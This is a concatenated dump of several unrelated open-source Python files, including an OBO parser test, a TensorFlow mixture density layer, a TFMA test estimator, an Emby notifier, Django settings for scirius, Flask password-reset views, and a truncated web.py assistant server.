from pyontutils import obo_io as oio
from .common import temp_path
obo_test_string = """format-version: 1.2
ontology: uberon/core
subsetdef: cumbo "CUMBO"
treat-xrefs-as-has-subclass: EV
import: http://purl.obolibrary.org/obo/uberon/chebi_import.owl
treat-xrefs-as-reverse-genus-differentia: TGMA part_of NCBITaxon:44484
[Term]
id: UBERON:0000003
xref: SCTID:272650008
relationship: in_lateral_side_of UBERON:0000033 {gci_relation="part_of", gci_filler="NCBITaxon:7776", notes="hagfish have median nostril"} ! head
!relationship: in_lateral_side_of UBERON:0000034 {gci_filler="NCBITaxon:7776", gci_relation="part_of", notes="hagfish have median nostril"} ! can't use this due to robot non-determinism
comment: robot does reorder the gci_ so that relation always comes before filler
property_value: external_definition "One of paired external openings of the nasal chamber.[AAO]" xsd:string {date_retrieved="2012-06-20", external_class="AAO:0000311", ontology="AAO", source="AAO:EJS"}
replaced_by: GO:0045202
consider: FMA:67408
[Term]
id: UBERON:0000033
name: head
comment: needed to prevent robot from throwing a null pointer on the relationship axiom above
[Term]
id: UBERON:0000034
[Typedef]
id: in_lateral_side_of
property_value: seeAlso FMA:86003
name: in_lateral_side_of
comment: id needed to prevent robot from throwing a null pointer on the relationship axiom above
comment: apparently also have to have name strangely enough and robot doesn't roundtrip random comments
is_transitive: true
"""
class TMHelper:
parse = oio.TVPair._parse_modifiers
serialize = oio.TVPair._format_trailing_modifiers
class TestOboIo(unittest.TestCase):
@classmethod
def setUpClass(cls):
if temp_path.exists():
shutil.rmtree(temp_path)
temp_path.mkdir()
@classmethod
def tearDownClass(cls):
shutil.rmtree(temp_path)
def test_parse_trailing_modifiers(self):
thm = TMHelper()
lines = (
(('relationship: part_of UBERON:0000949 '
'{source="AAO", source="FMA", source="XAO"} ! endocrine system'),
(('source', 'AAO'), ('source', 'FMA'), ('source', 'XAO'))),
('{oh="look", a="thing!"}', (('oh', 'look'), ('a', 'thing!'))),
('some randome values {oh="look", a="thing!"} ! yay!', (('oh', 'look'), ('a', 'thing!'))),
('some rando}me values {oh="l{ook", a="t{hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't{hing!'))),
('some rando}me values {oh="l{ook", a="t}hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't}hing!'))),
)
bads = [(expect, actual) for line, expect in lines
for _, actual in (thm.parse(line),)
if actual != expect]
assert not bads, '\n' + '\n\n'.join(f'{e}\n{a}' for e, a in bads)
def test_construct_simple_file(self):
of = oio.OboFile()
ids_names = [['123', 'test'],
['234', 'yee'],
['345', 'haw'],
['456', 'oio']]
terms = [oio.Term(id=i, name=n) for i, n in ids_names]
of.add(*terms)
str(of)
def test_header_treat_xrefs(self):
of = oio.OboFile()
test_tag = 'treat-xrefs-as-is_a'
tags_values = [
[test_tag, 'TEMP:test1'],
[test_tag, 'TEMP:test2'],
]
tvpairs = [oio.TVPair(tag=t, value=v) for t, v in tags_values]
of.header.add(*tvpairs)
tv = of.asObo()
assert len(tv.split(test_tag)) > 2, tv
def test_property_value_bug(self):
def _test(string):
pv = oio.Property_value.parse(string)
assert pv.value() == string
tv = oio.TVPair(string)
assert str(tv) == string
return pv, tv
minimal = ('property_value: any " ! " xsd:string')
pv, tv = _test(minimal)
darn = ('property_value: external_ontology_notes "see also MA:0002165 !'
' lieno-pancreatic vein" xsd:string {external_ontology="MA"}')
pv, tv = _test(darn)
ouch = ('property_value: editor_note "TODO -'
' this string breaks the parser A:0 ! wat" xsd:string')
pv, tv = _test(ouch)
hrm = ('property_value: editor_note "TODO -'
' consider relationship to UBERON:0000091 ! bilaminar disc" xsd:string')
pv, tv = _test(hrm)
def test_robot(self):
of1 = oio.OboFile(data=obo_test_string)
obo1 = of1.asObo(stamp=False)
obor1 = of1.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of2 = oio.OboFile(data=obo1)
obo2 = of2.asObo(stamp=False)
# can't test against obor2 because obo1 reordered the trailing qualifiers
# and since there is seemingly no rational way to predict those, we simply
# preserve the ordering that we got
obor2 = of2.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of3 = oio.OboFile(data=obor1)
obo3 = of3.asObo(stamp=False)
obor3 = of3.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
print(obo1)
print(obo2)
print(obor1)
print(obor2)
assert obo1 == obo2 == obo3 != obor1
assert obor1 == obor3
@pytest.mark.skipif(not shutil.which('robot'), reason='robot not installed')
def test_robot_rt(self):
of = oio.OboFile(data=obo_test_string)
obor1 = of.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
rtp = temp_path / 'robot-test.obo'
robot_path = temp_path / 'robot-test.test.obo'
of.write(rtp, stamp=False, version=oio.OBO_VER_ROBOT)
cmd = f'robot convert -vvv -i {rtp.as_posix()} -o {robot_path.as_posix()}'
wat = os.system(cmd)
if wat:
raise ValueError(wat)
datas = []
for path in (rtp, robot_path):
with open(path, 'rt') as f:
datas.append(f.read())
ours, rob = datas
assert ours == rob
| mit | -6,232,890,414,575,821,000 | 34.72619 | 201 | 0.598967 | false |
imito/odin | odin/networks/mixture_density_network.py | 1 | 10035 | from __future__ import absolute_import, division, print_function
import collections
import numpy as np
import tensorflow as tf
from sklearn.mixture import GaussianMixture
from tensorflow.python import keras
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras.layers import Dense
from tensorflow_probability.python import bijectors as tfb
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.layers.distribution_layer import (
DistributionLambda, _get_convert_to_tensor_fn, _serialize,
_serialize_function)
from tensorflow_probability.python.layers.internal import \
distribution_tensor_coercible as dtc
from tensorflow_probability.python.layers.internal import \
tensor_tuple as tensor_tuple
__all__ = ['MixtureDensityNetwork']
_COV_TYPES = ('none', 'diag', 'full', 'tril')
class MixtureDensityNetwork(Dense):
"""A mixture of Gaussian Keras layer.
Parameters
----------
units : `int`
number of output features for each component.
n_components : `int` (default=`2`)
The number of mixture components.
covariance_type : {'none', 'diag', 'full', 'tril'}
String describing the type of covariance parameters to use.
Must be one of:
'none' (each component has its own single variance),
'diag' (each component has its own diagonal covariance matrix),
'tril' (lower-triangular matrix),
'full' (each component has its own general covariance matrix).
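Example
-------
A minimal, hypothetical usage sketch (shapes and values are made up; only
`tf` and this layer are assumed):
>>> mdn = MixtureDensityNetwork(units=3, n_components=4, covariance_type='diag')
>>> dist = mdn(tf.zeros([8, 16]))        # mixture distribution over 3-d events
>>> sample = tf.convert_to_tensor(dist)  # concrete draw with shape (8, 3)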
"""
def __init__(self,
units,
n_components=2,
covariance_type='none',
convert_to_tensor_fn=tfd.Distribution.sample,
softplus_scale=True,
validate_args=False,
activation='linear',
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
covariance_type = str(covariance_type).lower()
assert covariance_type in _COV_TYPES, \
"No support for covariance_type: '%s', the support value are: %s" % \
(covariance_type, ', '.join(_COV_TYPES))
self._covariance_type = covariance_type
self._n_components = int(n_components)
self._validate_args = bool(validate_args)
self._convert_to_tensor_fn = _get_convert_to_tensor_fn(convert_to_tensor_fn)
self._softplus_scale = bool(softplus_scale)
# We'll need to keep track of who's calling who since the functional
# API has a different way of injecting `_keras_history` than the
# `keras.Sequential` way.
self._enter_dunder_call = False
# ====== calculating the number of parameters ====== #
if covariance_type == 'none':
component_params_size = 2 * units
elif covariance_type == 'diag': # only the diagonal
component_params_size = units + units
elif covariance_type == 'tril': # lower triangle
component_params_size = units + units * (units + 1) // 2
elif covariance_type == 'full': # full matrix
component_params_size = units + units * units
else:
raise NotImplementedError
self._component_params_size = component_params_size
params_size = self.n_components + self.n_components * component_params_size
self._event_size = units
super(MixtureDensityNetwork,
self).__init__(units=params_size,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
**kwargs)
@property
def event_size(self):
return self._event_size
@property
def covariance_type(self):
return self._covariance_type
@property
def n_components(self):
return self._n_components
@property
def component_params_size(self):
return self._component_params_size
def __call__(self, inputs, *args, **kwargs):
self._enter_dunder_call = True
distribution, _ = super(MixtureDensityNetwork,
self).__call__(inputs, *args, **kwargs)
self._enter_dunder_call = False
return distribution
def call(self, inputs, *args, **kwargs):
dense_kwargs = dict(kwargs)
dense_kwargs.pop('training', None)
params = super(MixtureDensityNetwork, self).call(inputs, *args,
**dense_kwargs)
n_components = tf.convert_to_tensor(value=self.n_components,
name='n_components',
dtype_hint=tf.int32)
# ====== mixture weights ====== #
mixture_coefficients = params[..., :n_components]
mixture_dist = tfd.Categorical(logits=mixture_coefficients,
validate_args=self._validate_args,
name="MixtureWeights")
# ====== initialize the components ====== #
params = tf.reshape(
params[..., n_components:],
tf.concat([tf.shape(input=params)[:-1], [n_components, -1]], axis=0))
if bool(self._softplus_scale):
scale_fn = lambda x: tf.math.softplus(x) + tfd.softplus_inverse(1.0)
else:
scale_fn = lambda x: x
if self.covariance_type == 'none':
cov = 'IndependentNormal'
loc_params, scale_params = tf.split(params, 2, axis=-1)
scale_params = scale_params
components_dist = tfd.Independent(tfd.Normal(
loc=loc_params,
scale=scale_fn(scale_params),
validate_args=self._validate_args),
reinterpreted_batch_ndims=1)
#
elif self.covariance_type == 'diag':
cov = 'MultivariateNormalDiag'
loc_params, scale_params = tf.split(params, 2, axis=-1)
components_dist = tfd.MultivariateNormalDiag(
loc=loc_params,
scale_diag=scale_fn(scale_params),
validate_args=self._validate_args)
#
elif self.covariance_type == 'tril':
cov = 'MultivariateNormalTriL'
loc_params = params[..., :self.event_size]
scale_params = scale_fn(params[..., self.event_size:])
scale_tril = tfb.ScaleTriL(diag_shift=np.array(
1e-5, params.dtype.as_numpy_dtype()),
validate_args=self._validate_args)
components_dist = tfd.MultivariateNormalTriL(
loc=loc_params,
scale_tril=scale_tril(scale_params),
validate_args=self._validate_args)
#
elif self.covariance_type == 'full':
cov = 'MultivariateNormalFull'
loc_params = params[..., :self.event_size]
scale_params = tf.reshape(
scale_fn(params[..., self.event_size:]),
tf.concat(
[tf.shape(input=params)[:-1], (self.event_size, self.event_size)],
axis=0))
components_dist = tfd.MultivariateNormalFullCovariance(
loc=loc_params,
covariance_matrix=scale_params,
validate_args=self._validate_args)
else:
raise NotImplementedError
# ====== finally the mixture ====== #
d = tfd.MixtureSameFamily(mixture_distribution=mixture_dist,
components_distribution=components_dist,
validate_args=False,
name="Mixture%s" % cov)
# Wraps the distribution to return both dist and concrete value."""
value_is_seq = isinstance(d.dtype, collections.Sequence)
maybe_composite_convert_to_tensor_fn = (
(lambda d: tensor_tuple.TensorTuple(self._convert_to_tensor_fn(d)))
if value_is_seq else self._convert_to_tensor_fn)
distribution = dtc._TensorCoercible( # pylint: disable=protected-access
distribution=d,
convert_to_tensor_fn=maybe_composite_convert_to_tensor_fn)
value = distribution._value() # pylint: disable=protected-access
value._tfp_distribution = distribution # pylint: disable=protected-access
if value_is_seq:
value.shape = value[-1].shape
value.get_shape = value[-1].get_shape
value.dtype = value[-1].dtype
distribution.shape = value[-1].shape
distribution.get_shape = value[-1].get_shape
else:
distribution.shape = value.shape
distribution.get_shape = value.get_shape
if self._enter_dunder_call:
# Its critical to return both distribution and concretization
# so Keras can inject `_keras_history` to both. This is what enables
# either to be used as an input to another Keras `Model`.
return distribution, value
return distribution
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(2)
if tensor_shape.dimension_value(input_shape[-1]) is None:
raise ValueError(
'The innermost dimension of input_shape must be defined, but saw: %s'
% input_shape)
# the number of output units is equal to event_size, not number of
# hidden units
return input_shape[:-1].concatenate(self.event_size)
def get_config(self):
"""Returns the config of this layer. """
config = {
'convert_to_tensor_fn': _serialize(self._convert_to_tensor_fn),
'covariance_type': self._covariance_type,
'validate_args': self._validate_args,
'n_components': self._n_components,
'softplus_scale': self._softplus_scale,
}
base_config = super(MixtureDensityNetwork, self).get_config()
base_config.update(config)
return base_config
| mit | -7,376,699,029,470,903,000 | 39.959184 | 80 | 0.621325 | false |
tensorflow/model-analysis | tensorflow_model_analysis/eval_saved_model/example_trainers/control_dependency_estimator.py | 1 | 6700 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
# Introduce a direct dependency on the values Tensor. If we
# introduce another intervening op like sparse_tensor_to_dense then
# regardless of whether TFMA correctly wrap SparseTensors we will not
# encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
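# A typical call from a test might look like (the paths are made up):
#   simple_control_dependency_estimator('/tmp/cd_model/export',
#                                       '/tmp/cd_model/eval_export')
# which trains the estimator for one step and writes both the serving
# SavedModel and the TFMA EvalSavedModel under the given directories.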
| apache-2.0 | -6,121,643,079,959,225,000 | 38.64497 | 80 | 0.673134 | false |
pedro2d10/SickRage-FR | sickbeard/notifiers/emby.py | 1 | 4193 | # coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import sickbeard
from sickbeard import logger
from sickrage.helper.exceptions import ex
try:
import json
except ImportError:
import simplejson as json
class Notifier(object):
def _notify_emby(self, message, host=None, emby_apikey=None):
"""Handles notifying Emby host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
# fill in omitted parameters
if not host:
host = sickbeard.EMBY_HOST
if not emby_apikey:
emby_apikey = sickbeard.EMBY_APIKEY
url = 'http://%s/emby/Notifications/Admin' % host
values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SickRage/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'}
data = json.dumps(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', emby_apikey)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
##############################################################################
# Public functions
##############################################################################
def test_notify(self, host, emby_apikey):
return self._notify_emby('This is a test notification from SickRage', host, emby_apikey)
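# Example (hypothetical host and API key):
#   Notifier().test_notify('192.168.1.10:8096', 'abcd1234')
# returns True when the Emby notification endpoint accepts the request.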
def update_library(self, show=None):
"""Handles updating the Emby Media Server host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
if sickbeard.USE_EMBY:
if not sickbeard.EMBY_HOST:
logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG)
return False
if show:
if show.indexer == 1:
provider = 'tvdb'
elif show.indexer == 2:
logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING)
return False
else:
logger.log(u'EMBY: Provider unknown', logger.WARNING)
return False
query = '?%sid=%s' % (provider, show.indexerid)
else:
query = ''
url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query)
values = {}
data = urllib.urlencode(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY)
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
| gpl-3.0 | -1,720,672,605,901,913,900 | 33.652893 | 178 | 0.576198 | false |
CyberTaoFlow/scirius | scirius/settings.py | 1 | 4444 | """
Django settings for scirius project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from distutils.version import LooseVersion
from django import get_version
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p8o5%vq))8h2li08c%k3id(wwo*u(^dbdmx2tv#t(tb2pr9@n-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_tables2',
'bootstrap3',
'rules',
'suricata',
'accounts',
)
if LooseVersion(get_version()) < LooseVersion('1.7'):
INSTALLED_APPS += ('south', )
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'scirius.loginrequired.LoginRequiredMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth'
)
ROOT_URLCONF = 'scirius.urls'
WSGI_APPLICATION = 'scirius.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Suricata binary
SURICATA_BINARY = "suricata"
# Elastic search
USE_ELASTICSEARCH = True
#ELASTICSEARCH_ADDRESS = "127.0.0.1:9200"
ELASTICSEARCH_ADDRESS = "localhost:9200"
# You can use a star to avoid timestamping expansion for example 'logstash-*'
ELASTICSEARCH_LOGSTASH_INDEX = "logstash-"
# use hourly, daily to indicate the logstash index building recurrence
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = "daily"
# Kibana
USE_KIBANA = False
# Use django as a reverse proxy for kibana request
# This will allow you to use scirius authentication to control
# access to Kibana
KIBANA_PROXY = False
# Kibana URL
KIBANA_URL = "http://localhost:9292"
# Kibana index name
KIBANA_INDEX = "kibana-int"
# Kibana version
KIBANA_VERSION=3
# Number of dashboards to display
KIBANA_DASHBOARDS_COUNT = 20
# Suricata is configured to write stats to EVE
USE_SURICATA_STATS = False
# Logstash is generating metrics on eve events
USE_LOGSTASH_STATS = False
# Influxdb
USE_INFLUXDB = False
INFLUXDB_HOST = "localhost"
INFLUXDB_PORT = 8086
INFLUXDB_USER = "grafana"
INFLUXDB_PASSWORD = "grafana"
INFLUXDB_DATABASE = "scirius"
# Proxy parameters
# Set USE_PROXY to True to use a proxy to fetch ruleset updates.
# PROXY_PARAMS contains the proxy parameters.
# If user is set in PROXY_PARAMS then basic authentication will
# be used.
USE_PROXY = False
PROXY_PARAMS = { 'http': "http://proxy:3128", 'https': "http://proxy:3128" }
# For basic authentication you can use
# PROXY_PARAMS = { 'http': "http://user:pass@proxy:3128", 'https': "http://user:pass@proxy:3128" }
GIT_SOURCES_BASE_DIRECTORY = os.path.join(BASE_DIR, 'git-sources/')
# Ruleset generator framework
RULESET_MIDDLEWARE = 'suricata'
LOGIN_URL = '/accounts/login/'
try:
from local_settings import *
except:
pass
if KIBANA_PROXY:
INSTALLED_APPS += ( 'revproxy',)
| gpl-3.0 | -3,509,663,828,025,243,000 | 24.988304 | 98 | 0.726373 | false |
bt3gl/Neat-Problems-in-Python-and-Flask | USEFUL/snippets_and_examples_Flask/example_password_reset/app/auth/views.py | 1 | 4889 | from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, \
current_user
from . import auth
from .. import db
from ..models import User
from ..email import send_email
from .forms import LoginForm, RegistrationForm, ChangePasswordForm,\
PasswordResetRequestForm, PasswordResetForm
@auth.before_app_request
def before_request():
if current_user.is_authenticated() \
and not current_user.confirmed \
and request.endpoint[:5] != 'auth.':
return redirect(url_for('auth.unconfirmed'))
@auth.route('/unconfirmed')
def unconfirmed():
if current_user.is_anonymous() or current_user.confirmed:
return redirect(url_for('main.index'))
return render_template('auth/unconfirmed.html')
@auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user, form.remember_me.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or password.')
return render_template('auth/login.html', form=form)
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'auth/email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('auth.login'))
return render_template('auth/register.html', form=form)
@auth.route('/confirm/<token>')
@login_required
def confirm(token):
if current_user.confirmed:
return redirect(url_for('main.index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('main.index'))
@auth.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'auth/email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('main.index'))
@auth.route('/change-password', methods=['GET', 'POST'])
@login_required
def change_password():
form = ChangePasswordForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
current_user.password = form.password.data
db.session.add(current_user)
flash('Your password has been updated.')
return redirect(url_for('main.index'))
else:
flash('Invalid password.')
return render_template("auth/change_password.html", form=form)
@auth.route('/reset', methods=['GET', 'POST'])
def password_reset_request():
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetRequestForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user:
token = user.generate_reset_token()
send_email(user.email, 'Reset Your Password',
'auth/email/reset_password',
user=user, token=token,
next=request.args.get('next'))
flash('An email with instructions to reset your password has been '
'sent to you.')
return redirect(url_for('auth.login'))
return render_template('auth/reset_password.html', form=form)
@auth.route('/reset/<token>', methods=['GET', 'POST'])
def password_reset(token):
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None:
return redirect(url_for('main.index'))
if user.reset_password(token, form.password.data):
flash('Your password has been updated.')
return redirect(url_for('auth.login'))
else:
return redirect(url_for('main.index'))
return render_template('auth/reset_password.html', form=form)
| mit | -1,030,766,068,768,395,900 | 35.485075 | 78 | 0.644713 | false |
meahmadi/nsun | server.py | 1 | 2333 | import web
import traceback
import webbrowser
from web.contrib import template
import os
import json
from datetime import datetime
#from ir.idehgostar.modir.assistant.mind import Mind
from ir.ac.iust.me_ahmadi.multiProcessMind.mind import Mind
render = template.render_genshi(['./templates/'])
urls = (
'/(.*)', 'Assistant'
)
class MyApplication(web.application):
def run(self, port=12010, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
app = MyApplication(urls, globals())
outbuffer = []
history = []
def getMindOutput(action,args):
Assistant.outbuffer.append([action,args])
def flushOutput():
t = []
t = Assistant.outbuffer
Assistant.outbuffer = []
Assistant.history += t
return t
Mind.singleton(getMindOutput)
class Assistant:
outbuffer = []
history = []
def __init__(self):
pass
def GET(self,name):
print "GET "+name
if not name:
return render.index(root="static");
def OPTIONS(self,args):
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
def POST(self,action):
if not action:
return '';
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
